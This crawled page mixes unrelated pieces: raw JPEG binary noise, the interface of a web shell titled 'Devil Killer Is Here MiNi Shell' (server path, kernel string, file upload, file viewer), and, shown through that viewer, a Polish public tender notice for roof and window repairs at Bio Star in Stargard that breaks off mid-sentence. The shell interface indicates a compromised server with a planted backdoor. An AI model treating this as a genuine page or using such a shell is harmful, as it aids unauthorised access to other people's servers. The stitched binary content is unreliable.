JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250918/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250918/0043072401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana stolarki okiennej, remont pokryć dachowych w budynkach <br/>w Bio Star Sp. z o.o. w Stargardzie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Bio Star Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 320737738</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bogusława IV, 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stargard</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">73-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">91 5733536</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@biostar.stargard.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.biostar.stargard.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana stolarki okiennej, remont pokryć dachowych w budynkach <br/>w Bio Star Sp. z o.o. w Stargardzie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b01d6cef-5f74-4d73-a8dc-b9c0ee409450</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00430724</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/biostar/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający urzęduje w następujących dniach: od poniedziałku do piątku w<br/>godzinach od 7:00 do 15:00,<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy użyciu platformy zakupowej OpenNexus https://platformazakupowa.pl/:<br/>a) Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na platformie zakupowej OpenNexus,<br/>b) Składania oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem Formularza do wysyłania wiadomości dostępnego na platformie zakupowej OpenNexus.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania, dobierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z platformy zakupowej OpenNexus oraz w instrukcjach zawartych na stronie https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Państwa danych osobowych przetwarzanych w związku z<br/>postępowaniem i zawarciem umowy na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2024 r., poz. 1320 ze zmianami dalej zwana „ustawa Pzp”), jest Bio Star Sp. z o.o., ul. Księcia Bogusława IV nr 15; 73-110 Stargard.<br/>Inspektor ochrony danych Mogą się Państwo kontaktować z naszym inspektorem ochrony danych, we wszystkich sprawach dotyczących przetwarzania Państwa danych i korzystania z Państwa praw, w następujący sposób: listownie na adres: Bio Star Sp. z o.o., ul. Księcia Bogusława IV nr 15; 73-110 Stargard, poprzez e-mail: malgorzata.gorka@ochrona.danych.osobowych.pl, telefonicznie: 500 071 091.<br/>Cel przetwarzania Państwa danych oraz podstawy prawne<br/>Państwa dane będą przetwarzane w celach wynikających z postępowania i zawarcia umowy na podstawie ustawy Pzp oraz w celu utrzymania kontaktów.<br/>Podstawą prawną ich przetwarzania jest: ustawa z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2024 r., poz. 1320 ze zmianami), ustawa o narodowym zasobie archiwalnym i archiwach (tj. Dz.U. 2018 r. poz. 217 ze zm.) art. 6 lit. b oraz c RODO, gdy przetwarzanie jest niezbędne do wykonania umowy, podjęcia działań przed jej zawarciem oraz do wypełnienia naszych<br/>obowiązków prawnych.<br/>Okres przechowywania danych.<br/>Państwa dane przetwarzane będą przez okres niezbędny do realizacji warunków umowy oraz spełnienia obowiązków archiwizacyjnych.<br/>Komu przekazujemy Państwa dane?<br/>Odbiorcami Pani/Pana danych osobowych będą:<br/>1) upoważnieni pracownicy Bio Star Sp. z o.o., którzy muszą mieć dostęp do danych, aby wykonywać swoje obowiązki,<br/>2) podmioty przetwarzające – którym Bio Star Sp. z o.o. zleci czynności przetwarzania danych, jeśli będzie to konieczne,<br/>3) dostęp tych podmiotów do Państwa danych będzie ograniczony wyłącznie do możliwości wglądu do informacji, w związku ze świadczeniem usług wsparcia technicznego, prawnego lub archiwizacyjnego. Odbiorców tych obowiązuje klauzula zachowania poufności danych, w tym danych osobowych,<br/>4) podmioty uprawnione na podstawie przepisów prawa (np. instytucje kontrolne), w przypadku uzasadnionego żądania.<br/>Przysługujące Państwu uprawnienia związane z przetwarzaniem danych osobowych.<br/>Przysługują Państwu następujące uprawnienia:<br/>- prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>- prawo do sprostowania (poprawiania) swoich danych,<br/>- prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku<br/>wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej,<br/>- prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa,<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, na adres: ul. Stawki 2, 00 - 193 Warszawa.<br/>Korzystanie z powyższych praw ułatwi Państwu nasz inspektor ochrony danych.<br/>Obowiązek podania danych.<br/>Podanie danych osobowych w związku z postępowaniem i zawarciem umowy na podstawie ustawy Pzp nie jest obowiązkowe, ale<br/>może być warunkiem niezbędnym do skutecznej realizacji umowy i utrzymania kontaktów.<br/>Inne informacje na temat przetwarzania danych osobowych.<br/>W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, nie będzie stosowane<br/>profilowanie.<br/>Państwa dane nie będą przekazywane poza Europejski Obszar Gospodarczy.<br/>Wszelkich dodatkowych informacji może Państwu udzielić nasz inspektor ochrony danych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 17/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 1 - Remont dachu budynku warsztatowo – magazynowego nr 1 wraz z przybudówką;<br/> Przedmiotem zamówienia jest wykonanie remontu pokryć dachowych pap wraz z obróbkami blacharskimi papowymi na budynku warsztatowo – magazynowym nr 1 o powierzchni dachu 748,5 m2 i dobudówki, której dach ma powierzchnię 4,4, m2 .<br/>	Zakres prac do wykonanie obejmuje min.:<br/>1) remont kapitalny dachu;<br/>2) rozbiórka pokrycia z papy wraz z rozbiórką obróbek blacharskich;<br/>3) wykonanie pokrycia z dwóch warstw papy podkładowej gr 4 mm; modyfikowanej SBS na osnowie poliestrowej oraz papy nawierzchniowej gr. 5,2 mm w kolorze grafitowym, modyfikowanej SBS na osnowie poliestrowej o gramaturze min. 250 g/m2.<br/>4) wykonanie nowych obróbek blacharskich z blachy stalowej powlekanej w kolorze RAL 7016<br/>5) wymianę instalacji odgromowej na dachu oraz ścianach wraz z pomiarem;<br/>6) montaż nowych rynien PCV<br/>7) montaż wentylatorów dachowych<br/>Uwaga: koszt wywozu i zagospodarowania odpadów z rozbiórki po stronie Zamawiającego. <br/>Szczegółowy opis przedmiotu zamówienia dla Części I został zamieszczony w Załączniku nr 2a do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261900-3 - Naprawa i konserwacja dachów</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1 W niniejszym postępowaniu wybór oferty dokonany zostanie na podstawie następujących kryteriów: <br/>1) P1 cena – 60 % - Dot. Część I, II i III zamówienia<br/>Za najkorzystniejszą zostanie uznana ta oferta, której oferta zawiera najniższą cenę i uzyska najwyższa punktację. <br/> Każda oferta będzie oceniona (punktowana) według następującego wzoru: <br/> Cena oferty najtańszej<br/> P1 = ---------------------------------------- x 100 x 60% przy czym 1 % = 1 pkt. <br/> Cena oferty ocenianej <br/> (P1 = ilość punktów w kryterium najniższa cena)<br/> Maksymalna ilość punktów w punktacji kryterium ceny wynosi 60.<br/>2)	P2 - termin wykonania - 40% - Dot. Część I, II i III zamówienia<br/>Zasady oceniania w kryterium „termin wykonania”. Maksymalny termin realizacji zamówienia został wyznaczony przez Zamawiającego na 15 grudnia 2025 r. Za skrócenie terminu wykonania robót budowlanych Zamawiający przyzna punkty zgodnie z następującą zasadą: <br/><br/>1.	Termin wykonania w dniach od 10 grudnia do 15 grudnia 2025 r. - 5 pkt<br/>2.	Termin wykonania w dniach od 4 grudnia do 9 grudnia 2025 r. - 15 pkt<br/>3.	Termin wykonania w dniach od 28 listopada do 3 grudnia 2025 r.	- 25 pkt<br/>4.	Termin wykonania w dniach od 21 listopada do 27 listopada 2025 r. - 40 pkt<br/><br/>(P2 = ilość punktów w kryterium termin wykonania)<br/>	Maksymalna ilość punktów do uzyskania w kryterium termin wykonania – 40 pkt.<br/>14.2 Oferty oceniane będą wg wzoru: <br/>P = P1 + P2<br/>gdzie: P – ilość punktów przyznanych ofercie w łącznej punktacji ocenianych kryteriów. <br/>P1 – ilość punktów przyznanych ofercie w kryterium ceny. <br/>P2 – ilość punktów przyznanych ofercie w kryterium termin wykonania <br/>Maksymalna ilość punktów w łącznej punktacji ocenianych kryteriów wynosi 100. Jako oferta najkorzystniejsza uznana zostanie ta, która otrzyma największą ilość punktów w łącznej punktacji ocenianych kryteriów. Obliczenia będą wykonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2. – Remont dachu budynku warsztatowego nr 2 oraz budynki gospodarcze nr 1 i 2 przy budynku warsztatowym nr 2;<br/>Przedmiotem zamówienia jest wykonanie remontu pokryć dachowych pap wraz z obróbkami blacharskimi papowymi na budynku warsztatowym nr 2 o powierzchni dachu – 327,1 m2, budynku gospodarczym nr 1 o powierzchni dachu - 29,1 m2 i budynku gospodarczym nr 2 o powierzchni dachu - 23,4 m2 .<br/>Zakres prac do wykonanie obejmuje min.:<br/>1) remont kapitalny dachu;<br/>2) rozbiórka pokrycia z papy wraz z rozbiórką obróbek blacharskich;<br/>3) wykonanie pokrycia z dwóch warstw papy podkładowej gr 4 mm; modyfikowanej SBS na osnowie poliestrowej oraz papy nawierzchniowej gr. 5,2 mm w kolorze grafitowym, modyfikowanej SBS na osnowie poliestrowej o gramaturze min. 250 g/m2.<br/>4) wykonanie nowych obróbek blacharskich z blachy stalowej powlekanej w kolorze RAL 7016<br/>5) wymianę instalacji odgromowej na dachu oraz ścianach wraz z pomiarem;<br/>6) montaż nowych rynien PCV<br/>7) wymiana wentylatorów ściennych<br/>Uwaga: koszt wywozu i zagospodarowania odpadów z rozbiórki po stronie Zamawiającego. <br/>Szczegółowy opis przedmiotu zamówienia dla Części II został zamieszczony w Załączniku nr 2b do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261900-3 - Naprawa i konserwacja dachów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W niniejszym postępowaniu wybór oferty dokonany zostanie na podstawie następujących kryteriów: <br/>1) P1 cena – 60 % - Dot. Część I, II i III zamówienia<br/>Za najkorzystniejszą zostanie uznana ta oferta, której oferta zawiera najniższą cenę i uzyska najwyższa punktację. <br/> Każda oferta będzie oceniona (punktowana) według następującego wzoru: <br/> Cena oferty najtańszej<br/> P1 = ---------------------------------------- x 100 x 60% przy czym 1 % = 1 pkt. <br/> Cena oferty ocenianej <br/> (P1 = ilość punktów w kryterium najniższa cena)<br/> Maksymalna ilość punktów w punktacji kryterium ceny wynosi 60.<br/>2)	P2 - termin wykonania - 40% - Dot. Część I, II i III zamówienia<br/>Zasady oceniania w kryterium „termin wykonania”. Maksymalny termin realizacji zamówienia został wyznaczony przez Zamawiającego na 15 grudnia 2025 r. Za skrócenie terminu wykonania robót budowlanych Zamawiający przyzna punkty zgodnie z następującą zasadą: <br/><br/>1.	Termin wykonania w dniach od 10 grudnia do 15 grudnia 2025 r. - 5 pkt<br/>2.	Termin wykonania w dniach od 4 grudnia do 9 grudnia 2025 r. - 15 pkt<br/>3.	Termin wykonania w dniach od 28 listopada do 3 grudnia 2025 r.	- 25 pkt<br/>4.	Termin wykonania w dniach od 21 listopada do 27 listopada 2025 r. - 40 pkt<br/><br/>(P2 = ilość punktów w kryterium termin wykonania)<br/>	Maksymalna ilość punktów do uzyskania w kryterium termin wykonania – 40 pkt.<br/>14.2 Oferty oceniane będą wg wzoru: <br/>P = P1 + P2<br/>gdzie: P – ilość punktów przyznanych ofercie w łącznej punktacji ocenianych kryteriów. <br/>P1 – ilość punktów przyznanych ofercie w kryterium ceny. <br/>P2 – ilość punktów przyznanych ofercie w kryterium termin wykonania <br/>Maksymalna ilość punktów w łącznej punktacji ocenianych kryteriów wynosi 100. Jako oferta najkorzystniejsza uznana zostanie ta, która otrzyma największą ilość punktów w łącznej punktacji ocenianych kryteriów. Obliczenia będą wykonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3. – Wymiana stolarki okiennej w budynkach warsztatowo – magazynowy nr 1 i budynku warsztatowym nr 2<br/>Przedmiotem zamówienia jest wymiana zewnętrznej stolarki okiennej w budynku warsztatowym i warsztatowo – magazynowym przy ul. Bogusława IV 15 w Stargardzie.<br/>1) Budynek warsztatowy – ilość okien do wymiany zgodnie z rysunkiem 7 sztuk, barwa RAL7016, zamurowanie jednego otworu okiennego, obróbka okien oraz wymiana podokienników. <br/>2) Budynek warsztatowo – magazynowy – ilość okien do wymiany zgodnie z rysunkiem 3 sztuki, barwa RAL7016. Dodatkowo jedno wewnętrzne pomiędzy pomieszczeniem warsztatu a garażu o wymiarach około 2*2 [m] do zamurowania, obróbka okien oraz wymiana podokienników.<br/>Uwaga: koszt wywozu i zagospodarowania odpadów z rozbiórki po stronie Zamawiającego. <br/>Szczegółowy opis przedmiotu zamówienia dla Części III został zamieszczony w Załączniku nr 2c do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W niniejszym postępowaniu wybór oferty dokonany zostanie na podstawie następujących kryteriów: <br/>1) P1 cena – 60 % - Dot. Część I, II i III zamówienia<br/>Za najkorzystniejszą zostanie uznana ta oferta, której oferta zawiera najniższą cenę i uzyska najwyższa punktację. <br/> Każda oferta będzie 